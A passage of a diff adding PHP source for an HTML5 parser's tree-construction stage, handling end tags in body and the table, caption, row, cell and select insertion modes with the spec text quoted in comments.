any. */ + $this->reconstructActiveFormattingElements(); + + $this->insertElement($token, true, true); + break; + } + break; + + case HTML5::ENDTAG: + switch($token['name']) { + /* An end tag with the tag name "body" */ + case 'body': + /* If the second element in the stack of open elements is + not a body element, this is a parse error. Ignore the token. + (innerHTML case) */ + if(count($this->stack) < 2 || $this->stack[1]->nodeName !== 'body') { + // Ignore. + + /* If the current node is not the body element, then this + is a parse error. */ + } elseif(end($this->stack)->nodeName !== 'body') { + // Parse error. + } + + /* Change the insertion mode to "after body". */ + $this->mode = self::AFTER_BODY; + break; + + /* An end tag with the tag name "html" */ + case 'html': + /* Act as if an end tag with tag name "body" had been seen, + then, if that token wasn't ignored, reprocess the current + token. */ + $this->inBody(array( + 'name' => 'body', + 'type' => HTML5::ENDTAG + )); + + return $this->afterBody($token); + break; + + /* An end tag whose tag name is one of: "address", "blockquote", + "center", "dir", "div", "dl", "fieldset", "listing", "menu", + "ol", "pre", "ul" */ + case 'address': case 'blockquote': case 'center': case 'dir': + case 'div': case 'dl': case 'fieldset': case 'listing': + case 'menu': case 'ol': case 'pre': case 'ul': + /* If the stack of open elements has an element in scope + with the same tag name as that of the token, then generate + implied end tags. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(); + + /* Now, if the current node is not an element with + the same tag name as that of the token, then this + is a parse error. */ + // w/e + + /* If the stack of open elements has an element in + scope with the same tag name as that of the token, + then pop elements from this stack until an element + with that tag name has been popped from the stack. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === $token['name']) { + $n = -1; + } + + array_pop($this->stack); + } + } + break; + + /* An end tag whose tag name is "form" */ + case 'form': + /* If the stack of open elements has an element in scope + with the same tag name as that of the token, then generate + implied end tags. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(); + + } + + if(end($this->stack)->nodeName !== $token['name']) { + /* Now, if the current node is not an element with the + same tag name as that of the token, then this is a parse + error. */ + // w/e + + } else { + /* Otherwise, if the current node is an element with + the same tag name as that of the token pop that element + from the stack. */ + array_pop($this->stack); + } + + /* In any case, set the form element pointer to null. */ + $this->form_pointer = null; + break; + + /* An end tag whose tag name is "p" */ + case 'p': + /* If the stack of open elements has a p element in scope, + then generate implied end tags, except for p elements. */ + if($this->elementInScope('p')) { + $this->generateImpliedEndTags(array('p')); + + /* If the current node is not a p element, then this is + a parse error. */ + // k + + /* If the stack of open elements has a p element in + scope, then pop elements from this stack until the stack + no longer has a p element in scope. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->elementInScope('p')) { + array_pop($this->stack); + + } else { + break; + } + } + } + break; + + /* An end tag whose tag name is "dd", "dt", or "li" */ + case 'dd': case 'dt': case 'li': + /* If the stack of open elements has an element in scope + whose tag name matches the tag name of the token, then + generate implied end tags, except for elements with the + same tag name as the token. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(array($token['name'])); + + /* If the current node is not an element with the same + tag name as the token, then this is a parse error. */ + // w/e + + /* If the stack of open elements has an element in scope + whose tag name matches the tag name of the token, then + pop elements from this stack until an element with that + tag name has been popped from the stack. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === $token['name']) { + $n = -1; + } + + array_pop($this->stack); + } + } + break; + + /* An end tag whose tag name is one of: "h1", "h2", "h3", "h4", + "h5", "h6" */ + case 'h1': case 'h2': case 'h3': case 'h4': case 'h5': case 'h6': + $elements = array('h1', 'h2', 'h3', 'h4', 'h5', 'h6'); + + /* If the stack of open elements has in scope an element whose + tag name is one of "h1", "h2", "h3", "h4", "h5", or "h6", then + generate implied end tags. */ + if($this->elementInScope($elements)) { + $this->generateImpliedEndTags(); + + /* Now, if the current node is not an element with the same + tag name as that of the token, then this is a parse error. */ + // w/e + + /* If the stack of open elements has in scope an element + whose tag name is one of "h1", "h2", "h3", "h4", "h5", or + "h6", then pop elements from the stack until an element + with one of those tag names has been popped from the stack. */ + while($this->elementInScope($elements)) { + array_pop($this->stack); + } + } + break; + + /* An end tag whose tag name is one of: "a", "b", "big", "em", + "font", "i", "nobr", "s", "small", "strike", "strong", "tt", "u" */ + case 'a': case 'b': case 'big': case 'em': case 'font': + case 'i': case 'nobr': case 's': case 'small': case 'strike': + case 'strong': case 'tt': case 'u': + /* 1. Let the formatting element be the last element in + the list of active formatting elements that: + * is between the end of the list and the last scope + marker in the list, if any, or the start of the list + otherwise, and + * has the same tag name as the token. + */ + while(true) { + for($a = count($this->a_formatting) - 1; $a >= 0; $a--) { + if($this->a_formatting[$a] === self::MARKER) { + break; + + } elseif($this->a_formatting[$a]->tagName === $token['name']) { + $formatting_element = $this->a_formatting[$a]; + $in_stack = in_array($formatting_element, $this->stack, true); + $fe_af_pos = $a; + break; + } + } + + /* If there is no such node, or, if that node is + also in the stack of open elements but the element + is not in scope, then this is a parse error. Abort + these steps. The token is ignored. */ + if(!isset($formatting_element) || ($in_stack && + !$this->elementInScope($token['name']))) { + break; + + /* Otherwise, if there is such a node, but that node + is not in the stack of open elements, then this is a + parse error; remove the element from the list, and + abort these steps. */ + } elseif(isset($formatting_element) && !$in_stack) { + unset($this->a_formatting[$fe_af_pos]); + $this->a_formatting = array_merge($this->a_formatting); + break; + } + + /* 2. Let the furthest block be the topmost node in the + stack of open elements that is lower in the stack + than the formatting element, and is not an element in + the phrasing or formatting categories. There might + not be one. */ + $fe_s_pos = array_search($formatting_element, $this->stack, true); + $length = count($this->stack); + + for($s = $fe_s_pos + 1; $s < $length; $s++) { + $category = $this->getElementCategory($this->stack[$s]->nodeName); + + if($category !== self::PHRASING && $category !== self::FORMATTING) { + $furthest_block = $this->stack[$s]; + } + } + + /* 3. If there is no furthest block, then the UA must + skip the subsequent steps and instead just pop all + the nodes from the bottom of the stack of open + elements, from the current node up to the formatting + element, and remove the formatting element from the + list of active formatting elements. */ + if(!isset($furthest_block)) { + for($n = $length - 1; $n >= $fe_s_pos; $n--) { + array_pop($this->stack); + } + + unset($this->a_formatting[$fe_af_pos]); + $this->a_formatting = array_merge($this->a_formatting); + break; + } + + /* 4. Let the common ancestor be the element + immediately above the formatting element in the stack + of open elements. */ + $common_ancestor = $this->stack[$fe_s_pos - 1]; + + /* 5. If the furthest block has a parent node, then + remove the furthest block from its parent node. */ + if($furthest_block->parentNode !== null) { + $furthest_block->parentNode->removeChild($furthest_block); + } + + /* 6. Let a bookmark note the position of the + formatting element in the list of active formatting + elements relative to the elements on either side + of it in the list. */ + $bookmark = $fe_af_pos; + + /* 7. Let node and last node be the furthest block. + Follow these steps: */ + $node = $furthest_block; + $last_node = $furthest_block; + + while(true) { + for($n = array_search($node, $this->stack, true) - 1; $n >= 0; $n--) { + /* 7.1 Let node be the element immediately + prior to node in the stack of open elements. */ + $node = $this->stack[$n]; + + /* 7.2 If node is not in the list of active + formatting elements, then remove node from + the stack of open elements and then go back + to step 1. */ + if(!in_array($node, $this->a_formatting, true)) { + unset($this->stack[$n]); + $this->stack = array_merge($this->stack); + + } else { + break; + } + } + + /* 7.3 Otherwise, if node is the formatting + element, then go to the next step in the overall + algorithm. */ + if($node === $formatting_element) { + break; + + /* 7.4 Otherwise, if last node is the furthest + block, then move the aforementioned bookmark to + be immediately after the node in the list of + active formatting elements. */ + } elseif($last_node === $furthest_block) { + $bookmark = array_search($node, $this->a_formatting, true) + 1; + } + + /* 7.5 If node has any children, perform a + shallow clone of node, replace the entry for + node in the list of active formatting elements + with an entry for the clone, replace the entry + for node in the stack of open elements with an + entry for the clone, and let node be the clone. */ + if($node->hasChildNodes()) { + $clone = $node->cloneNode(); + $s_pos = array_search($node, $this->stack, true); + $a_pos = array_search($node, $this->a_formatting, true); + + $this->stack[$s_pos] = $clone; + $this->a_formatting[$a_pos] = $clone; + $node = $clone; + } + + /* 7.6 Insert last node into node, first removing + it from its previous parent node if any. */ + if($last_node->parentNode !== null) { + $last_node->parentNode->removeChild($last_node); + } + + $node->appendChild($last_node); + + /* 7.7 Let last node be node. */ + $last_node = $node; + } + + /* 8. Insert whatever last node ended up being in + the previous step into the common ancestor node, + first removing it from its previous parent node if + any. */ + if($last_node->parentNode !== null) { + $last_node->parentNode->removeChild($last_node); + } + + $common_ancestor->appendChild($last_node); + + /* 9. Perform a shallow clone of the formatting + element. */ + $clone = $formatting_element->cloneNode(); + + /* 10. Take all of the child nodes of the furthest + block and append them to the clone created in the + last step. */ + while($furthest_block->hasChildNodes()) { + $child = $furthest_block->firstChild; + $furthest_block->removeChild($child); + $clone->appendChild($child); + } + + /* 11. Append that clone to the furthest block. */ + $furthest_block->appendChild($clone); + + /* 12. Remove the formatting element from the list + of active formatting elements, and insert the clone + into the list of active formatting elements at the + position of the aforementioned bookmark. */ + $fe_af_pos = array_search($formatting_element, $this->a_formatting, true); + unset($this->a_formatting[$fe_af_pos]); + $this->a_formatting = array_merge($this->a_formatting); + + $af_part1 = array_slice($this->a_formatting, 0, $bookmark - 1); + $af_part2 = array_slice($this->a_formatting, $bookmark, count($this->a_formatting)); + $this->a_formatting = array_merge($af_part1, array($clone), $af_part2); + + /* 13. Remove the formatting element from the stack + of open elements, and insert the clone into the stack + of open elements immediately after (i.e. in a more + deeply nested position than) the position of the + furthest block in that stack. */ + $fe_s_pos = array_search($formatting_element, $this->stack, true); + $fb_s_pos = array_search($furthest_block, $this->stack, true); + unset($this->stack[$fe_s_pos]); + + $s_part1 = array_slice($this->stack, 0, $fb_s_pos); + $s_part2 = array_slice($this->stack, $fb_s_pos + 1, count($this->stack)); + $this->stack = array_merge($s_part1, array($clone), $s_part2); + + /* 14. Jump back to step 1 in this series of steps. */ + unset($formatting_element, $fe_af_pos, $fe_s_pos, $furthest_block); + } + break; + + /* An end tag token whose tag name is one of: "button", + "marquee", "object" */ + case 'button': case 'marquee': case 'object': + /* If the stack of open elements has an element in scope whose + tag name matches the tag name of the token, then generate implied + tags. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(); + + /* Now, if the current node is not an element with the same + tag name as the token, then this is a parse error. */ + // k + + /* Now, if the stack of open elements has an element in scope + whose tag name matches the tag name of the token, then pop + elements from the stack until that element has been popped from + the stack, and clear the list of active formatting elements up + to the last marker. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === $token['name']) { + $n = -1; + } + + array_pop($this->stack); + } + + $marker = end(array_keys($this->a_formatting, self::MARKER, true)); + + for($n = count($this->a_formatting) - 1; $n > $marker; $n--) { + array_pop($this->a_formatting); + } + } + break; + + /* Or an end tag whose tag name is one of: "area", "basefont", + "bgsound", "br", "embed", "hr", "iframe", "image", "img", + "input", "isindex", "noembed", "noframes", "param", "select", + "spacer", "table", "textarea", "wbr" */ + case 'area': case 'basefont': case 'bgsound': case 'br': + case 'embed': case 'hr': case 'iframe': case 'image': + case 'img': case 'input': case 'isindex': case 'noembed': + case 'noframes': case 'param': case 'select': case 'spacer': + case 'table': case 'textarea': case 'wbr': + // Parse error. Ignore the token. + break; + + /* An end tag token not covered by the previous entries */ + default: + for($n = count($this->stack) - 1; $n >= 0; $n--) { + /* Initialise node to be the current node (the bottommost + node of the stack). */ + $node = end($this->stack); + + /* If node has the same tag name as the end tag token, + then: */ + if($token['name'] === $node->nodeName) { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* If the tag name of the end tag token does not + match the tag name of the current node, this is a + parse error. */ + // k + + /* Pop all the nodes from the current node up to + node, including node, then stop this algorithm. */ + for($x = count($this->stack) - $n; $x >= $n; $x--) { + array_pop($this->stack); + } + + } else { + $category = $this->getElementCategory($node); + + if($category !== self::SPECIAL && $category !== self::SCOPING) { + /* Otherwise, if node is in neither the formatting + category nor the phrasing category, then this is a + parse error. Stop this algorithm. The end tag token + is ignored. */ + return false; + } + } + } + break; + } + break; + } + } + + private function inTable($token) { + $clear = array('html', 'table'); + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $text = $this->dom->createTextNode($token['data']); + end($this->stack)->appendChild($text); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + end($this->stack)->appendChild($comment); + + /* A start tag whose tag name is "caption" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'caption') { + /* Clear the stack back to a table context. */ + $this->clearStackToTableContext($clear); + + /* Insert a marker at the end of the list of active + formatting elements. */ + $this->a_formatting[] = self::MARKER; + + /* Insert an HTML element for the token, then switch the + insertion mode to "in caption". */ + $this->insertElement($token); + $this->mode = self::IN_CAPTION; + + /* A start tag whose tag name is "colgroup" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'colgroup') { + /* Clear the stack back to a table context. */ + $this->clearStackToTableContext($clear); + + /* Insert an HTML element for the token, then switch the + insertion mode to "in column group". */ + $this->insertElement($token); + $this->mode = self::IN_CGROUP; + + /* A start tag whose tag name is "col" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'col') { + $this->inTable(array( + 'name' => 'colgroup', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + $this->inColumnGroup($token); + + /* A start tag whose tag name is one of: "tbody", "tfoot", "thead" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('tbody', 'tfoot', 'thead'))) { + /* Clear the stack back to a table context. */ + $this->clearStackToTableContext($clear); + + /* Insert an HTML element for the token, then switch the insertion + mode to "in table body". */ + $this->insertElement($token); + $this->mode = self::IN_TBODY; + + /* A start tag whose tag name is one of: "td", "th", "tr" */ + } elseif($token['type'] === HTML5::STARTTAG && + in_array($token['name'], array('td', 'th', 'tr'))) { + /* Act as if a start tag token with the tag name "tbody" had been + seen, then reprocess the current token. */ + $this->inTable(array( + 'name' => 'tbody', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inTableBody($token); + + /* A start tag whose tag name is "table" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'table') { + /* Parse error. Act as if an end tag token with the tag name "table" + had been seen, then, if that token wasn't ignored, reprocess the + current token. */ + $this->inTable(array( + 'name' => 'table', + 'type' => HTML5::ENDTAG + )); + + return $this->mainPhase($token); + + /* An end tag whose tag name is "table" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'table') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + return false; + + /* Otherwise: */ + } else { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* Now, if the current node is not a table element, then this + is a parse error. */ + // w/e + + /* Pop elements from this stack until a table element has been + popped from the stack. */ + while(true) { + $current = end($this->stack)->nodeName; + array_pop($this->stack); + + if($current === 'table') { + break; + } + } + + /* Reset the insertion mode appropriately. */ + $this->resetInsertionMode(); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html", "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html', 'tbody', 'td', + 'tfoot', 'th', 'thead', 'tr'))) { + // Parse error. Ignore the token. + + /* Anything else */ + } else { + /* Parse error. Process the token as if the insertion mode was "in + body", with the following exception: */ + + /* If the current node is a table, tbody, tfoot, thead, or tr + element, then, whenever a node would be inserted into the current + node, it must instead be inserted into the foster parent element. */ + if(in_array(end($this->stack)->nodeName, + array('table', 'tbody', 'tfoot', 'thead', 'tr'))) { + /* The foster parent element is the parent element of the last + table element in the stack of open elements, if there is a + table element and it has such a parent element. If there is no + table element in the stack of open elements (innerHTML case), + then the foster parent element is the first element in the + stack of open elements (the html element). Otherwise, if there + is a table element in the stack of open elements, but the last + table element in the stack of open elements has no parent, or + its parent node is not an element, then the foster parent + element is the element before the last table element in the + stack of open elements. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === 'table') { + $table = $this->stack[$n]; + break; + } + } + + if(isset($table) && $table->parentNode !== null) { + $this->foster_parent = $table->parentNode; + + } elseif(!isset($table)) { + $this->foster_parent = $this->stack[0]; + + } elseif(isset($table) && ($table->parentNode === null || + $table->parentNode->nodeType !== XML_ELEMENT_NODE)) { + $this->foster_parent = $this->stack[$n - 1]; + } + } + + $this->inBody($token); + } + } + + private function inCaption($token) { + /* An end tag whose tag name is "caption" */ + if($token['type'] === HTML5::ENDTAG && $token['name'] === 'caption') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore + + /* Otherwise: */ + } else { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* Now, if the current node is not a caption element, then this + is a parse error. */ + // w/e + + /* Pop elements from this stack until a caption element has + been popped from the stack. */ + while(true) { + $node = end($this->stack)->nodeName; + array_pop($this->stack); + + if($node === 'caption') { + break; + } + } + + /* Clear the list of active formatting elements up to the last + marker. */ + $this->clearTheActiveFormattingElementsUpToTheLastMarker(); + + /* Switch the insertion mode to "in table". */ + $this->mode = self::IN_TABLE; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "td", "tfoot", "th", "thead", "tr", or an end tag whose tag + name is "table" */ + } elseif(($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'td', 'tfoot', 'th', + 'thead', 'tr'))) || ($token['type'] === HTML5::ENDTAG && + $token['name'] === 'table')) { + /* Parse error. Act as if an end tag with the tag name "caption" + had been seen, then, if that token wasn't ignored, reprocess the + current token. */ + $this->inCaption(array( + 'name' => 'caption', + 'type' => HTML5::ENDTAG + )); + + return $this->inTable($token); + + /* An end tag whose tag name is one of: "body", "col", "colgroup", + "html", "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'col', 'colgroup', 'html', 'tbody', 'tfoot', 'th', + 'thead', 'tr'))) { + // Parse error. Ignore the token. + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in body". */ + $this->inBody($token); + } + } + + private function inColumnGroup($token) { + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $text = $this->dom->createTextNode($token['data']); + end($this->stack)->appendChild($text); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + end($this->stack)->appendChild($comment); + + /* A start tag whose tag name is "col" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'col') { + /* Insert a col element for the token. Immediately pop the current + node off the stack of open elements. */ + $this->insertElement($token); + array_pop($this->stack); + + /* An end tag whose tag name is "colgroup" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'colgroup') { + /* If the current node is the root html element, then this is a + parse error, ignore the token. (innerHTML case) */ + if(end($this->stack)->nodeName === 'html') { + // Ignore + + /* Otherwise, pop the current node (which will be a colgroup + element) from the stack of open elements. Switch the insertion + mode to "in table". */ + } else { + array_pop($this->stack); + $this->mode = self::IN_TABLE; + } + + /* An end tag whose tag name is "col" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'col') { + /* Parse error. Ignore the token. */ + + /* Anything else */ + } else { + /* Act as if an end tag with the tag name "colgroup" had been seen, + and then, if that token wasn't ignored, reprocess the current token. */ + $this->inColumnGroup(array( + 'name' => 'colgroup', + 'type' => HTML5::ENDTAG + )); + + return $this->inTable($token); + } + } + + private function inTableBody($token) { + $clear = array('tbody', 'tfoot', 'thead', 'html'); + + /* A start tag whose tag name is "tr" */ + if($token['type'] === HTML5::STARTTAG && $token['name'] === 'tr') { + /* Clear the stack back to a table body context. */ + $this->clearStackToTableContext($clear); + + /* Insert a tr element for the token, then switch the insertion + mode to "in row". */ + $this->insertElement($token); + $this->mode = self::IN_ROW; + + /* A start tag whose tag name is one of: "th", "td" */ + } elseif($token['type'] === HTML5::STARTTAG && + ($token['name'] === 'th' || $token['name'] === 'td')) { + /* Parse error. Act as if a start tag with the tag name "tr" had + been seen, then reprocess the current token. */ + $this->inTableBody(array( + 'name' => 'tr', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inRow($token); + + /* An end tag whose tag name is one of: "tbody", "tfoot", "thead" */ + } elseif($token['type'] === HTML5::ENDTAG && + in_array($token['name'], array('tbody', 'tfoot', 'thead'))) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore + + /* Otherwise: */ + } else { + /* Clear the stack back to a table body context. */ + $this->clearStackToTableContext($clear); + + /* Pop the current node from the stack of open elements. Switch + the insertion mode to "in table". */ + array_pop($this->stack); + $this->mode = self::IN_TABLE; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "tfoot", "thead", or an end tag whose tag name is "table" */ + } elseif(($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'tfoor', 'thead'))) || + ($token['type'] === HTML5::STARTTAG && $token['name'] === 'table')) { + /* If the stack of open elements does not have a tbody, thead, or + tfoot element in table scope, this is a parse error. Ignore the + token. (innerHTML case) */ + if(!$this->elementInScope(array('tbody', 'thead', 'tfoot'), true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Clear the stack back to a table body context. */ + $this->clearStackToTableContext($clear); + + /* Act as if an end tag with the same tag name as the current + node ("tbody", "tfoot", or "thead") had been seen, then + reprocess the current token. */ + $this->inTableBody(array( + 'name' => end($this->stack)->nodeName, + 'type' => HTML5::ENDTAG + )); + + return $this->mainPhase($token); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html", "td", "th", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html', 'td', 'th', 'tr'))) { + /* Parse error. Ignore the token. */ + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in table". */ + $this->inTable($token); + } + } + + private function inRow($token) { + $clear = array('tr', 'html'); + + /* A start tag whose tag name is one of: "th", "td" */ + if($token['type'] === HTML5::STARTTAG && + ($token['name'] === 'th' || $token['name'] === 'td')) { + /* Clear the stack back to a table row context. */ + $this->clearStackToTableContext($clear); + + /* Insert an HTML element for the token, then switch the insertion + mode to "in cell". */ + $this->insertElement($token); + $this->mode = self::IN_CELL; + + /* Insert a marker at the end of the list of active formatting + elements. */ + $this->a_formatting[] = self::MARKER; + + /* An end tag whose tag name is "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'tr') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Clear the stack back to a table row context. */ + $this->clearStackToTableContext($clear); + + /* Pop the current node (which will be a tr element) from the + stack of open elements. Switch the insertion mode to "in table + body". */ + array_pop($this->stack); + $this->mode = self::IN_TBODY; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "tfoot", "thead", "tr" or an end tag whose tag name is "table" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'tfoot', 'thead', 'tr'))) { + /* Act as if an end tag with the tag name "tr" had been seen, then, + if that token wasn't ignored, reprocess the current token. */ + $this->inRow(array( + 'name' => 'tr', + 'type' => HTML5::ENDTAG + )); + + return $this->inCell($token); + + /* An end tag whose tag name is one of: "tbody", "tfoot", "thead" */ + } elseif($token['type'] === HTML5::ENDTAG && + in_array($token['name'], array('tbody', 'tfoot', 'thead'))) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Otherwise, act as if an end tag with the tag name "tr" had + been seen, then reprocess the current token. */ + $this->inRow(array( + 'name' => 'tr', + 'type' => HTML5::ENDTAG + )); + + return $this->inCell($token); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html", "td", "th" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html', 'td', 'th', 'tr'))) { + /* Parse error. Ignore the token. */ + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in table". */ + $this->inTable($token); + } + } + + private function inCell($token) { + /* An end tag whose tag name is one of: "td", "th" */ + if($token['type'] === HTML5::ENDTAG && + ($token['name'] === 'td' || $token['name'] === 'th')) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as that of the token, then this is a + parse error and the token must be ignored. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise: */ + } else { + /* Generate implied end tags, except for elements with the same + tag name as the token. */ + $this->generateImpliedEndTags(array($token['name'])); + + /* Now, if the current node is not an element with the same tag + name as the token, then this is a parse error. */ + // k + + /* Pop elements from this stack until an element with the same + tag name as the token has been popped from the stack. */ + while(true) { + $node = end($this->stack)->nodeName; + array_pop($this->stack); + + if($node === $token['name']) { + break; + } + } + + /* Clear the list of active formatting elements up to the last + marker. */ + $this->clearTheActiveFormattingElementsUpToTheLastMarker(); + + /* Switch the insertion mode to "in row". (The current node + will be a tr element at this point.) */ + $this->mode = self::IN_ROW; + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'td', 'tfoot', 'th', + 'thead', 'tr'))) { + /* If the stack of open elements does not have a td or th element + in table scope, then this is a parse error; ignore the token. + (innerHTML case) */ + if(!$this->elementInScope(array('td', 'th'), true)) { + // Ignore. + + /* Otherwise, close the cell (see below) and reprocess the current + token. */ + } else { + $this->closeCell(); + return $this->inRow($token); + } + + /* A start tag whose tag name is one of: "caption", "col", "colgroup", + "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('caption', 'col', 'colgroup', 'tbody', 'td', 'tfoot', 'th', + 'thead', 'tr'))) { + /* If the stack of open elements does not have a td or th element + in table scope, then this is a parse error; ignore the token. + (innerHTML case) */ + if(!$this->elementInScope(array('td', 'th'), true)) { + // Ignore. + + /* Otherwise, close the cell (see below) and reprocess the current + token. */ + } else { + $this->closeCell(); + return $this->inRow($token); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html'))) { + /* Parse error. Ignore the token. */ + + /* An end tag whose tag name is one of: "table", "tbody", "tfoot", + "thead", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('table', 'tbody', 'tfoot', 'thead', 'tr'))) { + /* If the stack of open elements does not have an element in table + scope with the same tag name as that of the token (which can only + happen for "tbody", "tfoot" and "thead", or, in the innerHTML case), + then this is a parse error and the token must be ignored. */ + if(!$this->elementInScope($token['name'], true)) { + // Ignore. + + /* Otherwise, close the cell (see below) and reprocess the current + token. */ + } else { + $this->closeCell(); + return $this->inRow($token); + } + + /* Anything else */ + } else { + /* Process the token as if the insertion mode was "in body". */ + $this->inBody($token); + } + } + + private function inSelect($token) { + /* Handle the token as follows: */ + + /* A character token */ + if($token['type'] === HTML5::CHARACTR) { + /* Append the token's character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag token whose tag name is "option" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'option') { + /* If the current node is an option element, act as if an end tag + with the tag name "option" had been seen. */ + if(end($this->stack)->nodeName === 'option') { + $this->inSelect(array( + 'name' => 'option', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* A start tag token whose tag name is "optgroup" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'optgroup') { + /* If the current node is an option element, act as if an end tag + with the tag name "option" had been seen. */ + if(end($this->stack)->nodeName === 'option') { + $this->inSelect(array( + 'name' => 'option', + 'type' => HTML5::ENDTAG + )); + } + + /* If the current node is an optgroup element, act as if an end tag + with the tag name "optgroup" had been seen. */ + if(end($this->stack)->nodeName === 'optgroup') { + $this->inSelect(array( + 'name' => 'optgroup', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* An end tag token whose tag name is "optgroup" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'optgroup') { + /* First, if the current node is an option element, and the node + immediately before it in the stack of open elements is an optgroup + element, then act as if an end tag with the tag name "option" had + been seen. */ + $elements_in_stack = count($this->stack); + + if($this->stack[$elements_in_stack - 1]->nodeName === 'option' && + $this->stack[$elements_in_stack - 2]->nodeName === 'optgroup') { + $this->inSelect(array( + 